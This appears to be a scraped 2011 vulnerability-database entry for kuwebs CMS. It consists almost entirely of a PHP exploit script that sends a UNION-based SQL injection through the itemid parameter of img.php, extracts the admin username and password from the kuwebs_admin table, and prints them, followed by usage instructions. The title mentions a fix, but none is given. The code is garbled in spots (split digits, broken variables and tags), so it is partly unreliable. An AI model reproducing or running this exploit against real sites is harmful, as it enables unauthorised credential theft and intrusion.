kuwebs 0day and fix-vulnerability warning-the black bar safety net

2011-09-26T00:00:00
ID MYHACK58:62201131925
Type myhack58
Reporter 佚名
Modified 2011-09-26T00:00:00

Description

<? php

error_reporting(E_ERROR);

print_r('

+---------------------------------------------------------------------+

kuwebs cms sql injection exp

Home: www.hkmjj.com www.badguest.cn

+---------------------------------------------------------------------+

');

if ($argc < 2) {

print_r('

Usage: php '.$ argv[0].' host /path

Example: php '.$ argv[0].' 127.0.0.1 cc

');

die();

}

ob_start();

$host = $argv[1];

$path= $argv[2];

$sock = fsockopen($host, 8 0, $errno, $errstr, 3 0);

if (!$ sock) die("$errstr ($errno)\n");

fwrite($sock, "GET /$path/img/img. php? lang=cn&itemid=5 8%20and%2 0 1=2%20union%20select%2 0 1,concat(0x6F756F757E,adminuser,0x2D,adminpassword,0x7E31),3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5+from+kuwebs_admin%2 0-- HTTP/1.1\r\n");

fwrite($sock, "Host: $host\r\n");

fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/2 0 1 0 0 1 0 1 For Firefox/6.0.2\r\n");

fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n");

fwrite($sock, "Accept-Language: EN-us,EN;q=0.5\r\n");

fwrite($sock, "Connection: keep-alive\r\n\r\n");

$headers = "";

while ($str = trim(fgets($sock, 1 0 2 4)))

$headers .= "$str\n";

$body = "";

while (! feof($sock))

$body .= fgets($sock, 1 0 2 4);

fclose($sock);

ob_end_flush();

//print_r($body);

if (strpos($body, 'ouou') !== false) {

preg_match('/ouou~(.*?)~ 1/', $body, $arr);

$result=explode("-",$arr[1]);

print_r("Exploit Success! \nusername:".$ result[0]."\ npassword:".$ result[1]."\ n");

}

else{

print_r("Exploit Failed! \n");

}

?& gt;

Save exp.php run

php.exe exp.php 127.0.0.1

from: hkmjj.com